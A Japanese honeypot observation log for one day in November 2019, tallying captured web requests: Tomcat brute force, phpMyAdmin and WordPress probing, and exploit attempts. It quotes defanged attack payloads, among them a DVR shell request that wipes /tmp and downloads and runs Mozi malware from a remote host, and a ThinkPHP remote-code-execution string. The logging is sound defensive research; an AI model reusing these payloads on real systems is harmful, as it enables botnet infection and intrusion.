WOWHoneypot観察(257日目)
2019/11/28(木)
トータルは4143件でした。
ハンティングログは以下です。
218.21.170[.]249 wget+hxxp[:]//218.21.170[.]249:43098/Mozi.a |
5.53.57[.]76 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b |
件数 | 概要 | リクエスト |
---|---|---|
4002 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
36 | アクセス | GET / |
9 | phpMyAdminの調査 | GET /scripts/setup.php |
8 | phpMyAdminの調査 | GET /phpmyadmin/setup.php |
8 | phpMyAdminの調査 | GET /phpmyadmin/scripts/_setup.php |
8 | phpMyAdminの調査 | GET /mysql/scripts/setup.php |
8 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
8 | phpMyAdminの調査 | GET /imp/test.php |
8 | phpMyAdminの調査 | GET /_phpmyadmin/scripts/setup.php |
8 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
7 | WordPressの調査 | GET /wp-login.php |
7 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
6 | WordPressの調査 | POST /xmlrpc.php |
6 | WordPressの調査 | POST /wp-login.php |
3 | 調査 | GET /script |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | Blue Angel Software Suiteの脆弱性を狙った通信 | POST /cgi-bin/webctrl.cgi |
1 | 調査 | OPTIONS / |
1 | MVPower DVRの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//218.21.170[.]249:43098/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
1 | WordPressの調査 | GET ///?author=1 |